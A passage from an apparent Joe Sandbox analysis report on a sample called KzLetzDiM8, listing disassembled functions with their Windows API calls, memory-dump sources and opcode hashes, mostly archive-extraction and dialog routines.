                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: f07f2e72eccb705886d351a89c10b6daac84c4be1a46d89da2b553ac60ab6e91
                                                            • Instruction ID: a286b71be2871e93da868b7ecf2a977fee91e561a38ea40ac1539855731a49fa
                                                            • Opcode Fuzzy Hash: f07f2e72eccb705886d351a89c10b6daac84c4be1a46d89da2b553ac60ab6e91
                                                            • Instruction Fuzzy Hash: B9F03C72A01219BBCB20ABA5FC4CDEF7FBEEF56791B104121F60AD2050D6758646C7A0
                                                            Function 001EC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001EB92D: _wcsrchr.LIBVCRUNTIME ref: 001EB944
                                                            • _wcslen.LIBCMT ref: 001EC197
                                                            • _wcslen.LIBCMT ref: 001EC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 985c6d8757065f6d0d63b89fc283c80d05ccd62506b0c23888b7d6d75e69e50b
                                                            • Instruction ID: 409a861ad434cea9ea1b9f220db5cb0de7727f2ef37f39c60d7603207d24f04a
                                                            • Opcode Fuzzy Hash: 985c6d8757065f6d0d63b89fc283c80d05ccd62506b0c23888b7d6d75e69e50b
                                                            • Instruction Fuzzy Hash: 55411525500BD6D5C736AF658C52ABEB3A8EF55B54F14090EF9816B182EB604DC3C3D1
                                                            Function 001EBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001EBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,001EA275,?,?,00000800,?,001EA23A,?,001E755C), ref: 001EBBC5
                                                            • _wcslen.LIBCMT ref: 001EBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: e2b5ee423adb1ea6131abc4a8eff5a12093c6598f48c17c6d1de1ecb4b1650da
                                                            • Instruction ID: e6bc71a6021aba1a25c46f4649d9592fde6cd8e4d60dff36207fc7a9a31601f8
                                                            • Opcode Fuzzy Hash: e2b5ee423adb1ea6131abc4a8eff5a12093c6598f48c17c6d1de1ecb4b1650da
                                                            • Instruction Fuzzy Hash: 1F41F731408699A6CF21AF61CC81EEFB7B9AF55354F244026F554B3151DBB0EE90CB50
                                                            Function 001FCD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcschr.LIBVCRUNTIME ref: 001FCD84
                                                              • Part of subcall function 001FAF98: _wcschr.LIBVCRUNTIME ref: 001FB033
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$CompareString
                                                            • String ID: <$HIDE$MAX$MIN
                                                            • API String ID: 69343711-3358265660
                                                            • Opcode ID: 2b500b02f3585ca05e235844eabaaa4a4f3073c807e0518ae6c6f1b5e3dbba12
                                                            • Instruction ID: 688b7a731b04f79ae847f26a44dfe88e5d89381b7e45902fec89a14f1cbf9555
                                                            • Opcode Fuzzy Hash: 2b500b02f3585ca05e235844eabaaa4a4f3073c807e0518ae6c6f1b5e3dbba12
                                                            • Instruction Fuzzy Hash: C131817290021DAADF25DB60DC45EFE77BDFB25350F4041A6EA05E7180EBB09E848FA1
                                                            Function 001EB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001EB9B8
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • _wcschr.LIBVCRUNTIME ref: 001EB9D6
                                                            • _wcschr.LIBVCRUNTIME ref: 001EB9E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 525462905-3142399695
                                                            • Opcode ID: 7479f2caf004a9a5cfd6bc818b1d316b8530b492811909a6299ea1589e34864d
                                                            • Instruction ID: 67c0e6054e185280a5b5de7c40674bd4b2d2c5d758e4aa0e180e2ec446911fba
                                                            • Opcode Fuzzy Hash: 7479f2caf004a9a5cfd6bc818b1d316b8530b492811909a6299ea1589e34864d
                                                            • Instruction Fuzzy Hash: 6F0145A3118B5169DB35AB768CC6D6FA3ECEED13B0B50441AF544D3083EB20D86482B1
                                                            Function 001FB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FB2BE
                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001FB2D6
                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 001FB304
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: GETPASSWORD1$xz#
                                                            • API String ID: 445417207-2979902089
                                                            • Opcode ID: 848515701745a9e9df1b02b2e27b4e4071bcca68108f61cf2960423adb91266c
                                                            • Instruction ID: 8224af003fbea8131bd01373d27d5ecc40c02f4ed13df4d8f83ae7e5a22fac14
                                                            • Opcode Fuzzy Hash: 848515701745a9e9df1b02b2e27b4e4071bcca68108f61cf2960423adb91266c
                                                            • Instruction Fuzzy Hash: 3011C432A4411CB6DB229AA4EC89FFF376CFF5A750F140020FB49B20C0D7A0AA559761
                                                            Function 001FB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 001FB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001FB712
                                                            • DeleteObject.GDI32(00000000), ref: 001FB744
                                                            • DeleteObject.GDI32(00000000), ref: 001FB767
                                                              • Part of subcall function 001FA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,001FB73D,00000066), ref: 001FA6D5
                                                              • Part of subcall function 001FA6C2: SizeofResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA6EC
                                                              • Part of subcall function 001FA6C2: LoadResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA703
                                                              • Part of subcall function 001FA6C2: LockResource.KERNEL32(00000000,?,?,?,001FB73D,00000066), ref: 001FA712
                                                              • Part of subcall function 001FA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,001FB73D,00000066), ref: 001FA72D
                                                              • Part of subcall function 001FA6C2: GlobalLock.KERNEL32(00000000), ref: 001FA73E
                                                              • Part of subcall function 001FA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 001FA762
                                                              • Part of subcall function 001FA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001FA7A7
                                                              • Part of subcall function 001FA6C2: GlobalUnlock.KERNEL32(00000000), ref: 001FA7C6
                                                              • Part of subcall function 001FA6C2: GlobalFree.KERNEL32(00000000), ref: 001FA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: 3288355122d43ce4106402ef0089230730e492b08ed58fb13e09d398af81efde
                                                            • Instruction ID: 0193fbe1cb11ee0da934af0bcc5ea6750d7afef3e53eda2bfcace0791a42bb3b
                                                            • Opcode Fuzzy Hash: 3288355122d43ce4106402ef0089230730e492b08ed58fb13e09d398af81efde
                                                            • Instruction Fuzzy Hash: C201663A900109A7C712B7749C4DA7F7AB99FC1762F140211FB04A3291DF258D054261
                                                            Function 001FD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FD64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001FD661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001FD675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 001FD684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: 165dfc55fca2014cd73951619b3bfa13653be1484036c30c45a0e09245f315cf
                                                            • Instruction ID: 7418c22cdd41213d49d4bf6470e54c88ff5f1c9934bef833c1a9d009da7cb0dc
                                                            • Opcode Fuzzy Hash: 165dfc55fca2014cd73951619b3bfa13653be1484036c30c45a0e09245f315cf
                                                            • Instruction Fuzzy Hash: 7901D873685218BAD211DF64BE0DFBB775EEBABB21F110511F305E60D0C7A299048775
                                                            Function 00207E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00207E24,?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002), ref: 00207E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00207EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00207E24,?,?,00207DC4,?,0021C300,0000000C,00207F1B,?,00000002,00000000), ref: 00207EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 854ec6a41bc34eddbf2f2e027b1e953902e0d5eefe673a1f2fe9813bcd56b30c
                                                            • Instruction ID: 0c64c6dcda3edb27f2a7b389def4e1d3ddcbce4924e47ce20c11cfd97a25cd5e
                                                            • Opcode Fuzzy Hash: 854ec6a41bc34eddbf2f2e027b1e953902e0d5eefe673a1f2fe9813bcd56b30c
                                                            • Instruction Fuzzy Hash: FEF04431A11209BBDB11DFA0EC0DBDEBFB5EF54711F0480A9F805A2191DF749E51CA90
                                                            Function 001EF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001F0836
                                                              • Part of subcall function 001F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001EF2D8,Crypt32.dll,00000000,001EF35C,?,?,001EF33E,?,?,?), ref: 001F0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001EF2E4
                                                            • GetProcAddress.KERNEL32(002281C8,CryptUnprotectMemory), ref: 001EF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 342a99bb921bee5b73ca93367a613bfb25f332e77fee6ef964313dd2b45cb012
                                                            • Instruction ID: 76d80a434c8221db77fd5892c851c4e70452bc6b271bb7bf5d869740f6fc25a0
                                                            • Opcode Fuzzy Hash: 342a99bb921bee5b73ca93367a613bfb25f332e77fee6ef964313dd2b45cb012
                                                            • Instruction Fuzzy Hash: 07E02C30820B42AECB20DF39A80CB82BED66F39700F00C82DF0CAA3240CBB0D0C08B00
                                                            Function 00202BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: 325f14264928d1255b07399f06904960e5e2a9d04c53ebaf0a3d322cbdd7e41a
                                                            • Instruction ID: 4d7ccceb4a590a20903bd99ad8ba0a61f1e4792cf105d467bdfdca213bc5fa89
                                                            • Opcode Fuzzy Hash: 325f14264928d1255b07399f06904960e5e2a9d04c53ebaf0a3d322cbdd7e41a
                                                            • Instruction Fuzzy Hash: 6851A071520312EFEB298F14D889BAA77A4FF54310F24452BEC05476E2D771ADA8DB90
                                                            Function 0020BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0020BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020BF5C
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0020BF82
                                                            • _free.LIBCMT ref: 0020BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0020BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 0cb7a92bfabb3c5b35aae0c339394e12cd385ef10fa6e42b1c7700da536035b6
                                                            • Instruction ID: fb5e11e1c54fa74c5b8bbf8def6919a94a3efe84209745fa3f00c4bab922bf81
                                                            • Opcode Fuzzy Hash: 0cb7a92bfabb3c5b35aae0c339394e12cd385ef10fa6e42b1c7700da536035b6
                                                            • Instruction Fuzzy Hash: A801F7726213137FA7325A766C4CCBB6A6DDEC6BA03144129FD08C3282EF60CD1189B0
                                                            Function 00209869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,002091AD,0020B188,?,00209813,00000001,00000364,?,002040EF,?,?,00221098), ref: 0020986E
                                                            • _free.LIBCMT ref: 002098A3
                                                            • _free.LIBCMT ref: 002098CA
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 002098D7
                                                            • SetLastError.KERNEL32(00000000,?,00221098), ref: 002098E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 519cde4bcf9a38c0b8490a4900b233fcfcdb54214284fd02072df374e83e4dd4
                                                            • Instruction ID: c866575e04248844622d0a773ab2ea3adc7464c8c3563a720502a7b715894d7b
                                                            • Opcode Fuzzy Hash: 519cde4bcf9a38c0b8490a4900b233fcfcdb54214284fd02072df374e83e4dd4
                                                            • Instruction Fuzzy Hash: BF01F9361757026BD7126B38BC8995B266EDFE37B07218134F917A23D3EE708C715521
                                                            Function 001F0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001F11CF: ResetEvent.KERNEL32(?), ref: 001F11E1
                                                              • Part of subcall function 001F11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 001F11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 001F0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 001F0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 001F0F54
                                                            • CloseHandle.KERNEL32(?), ref: 001F0F60
                                                            • CloseHandle.KERNEL32(?), ref: 001F0F6C
                                                              • Part of subcall function 001F0FE4: WaitForSingleObject.KERNEL32(?,000000FF,001F1101,?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FEA
                                                              • Part of subcall function 001F0FE4: GetLastError.KERNEL32(?,?,001F117F,?,?,?,?,?,001F1169), ref: 001F0FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: e37dd03f429ca92429bc4d513f38898f554d99e428cbde13fe964fe1eaf41cda
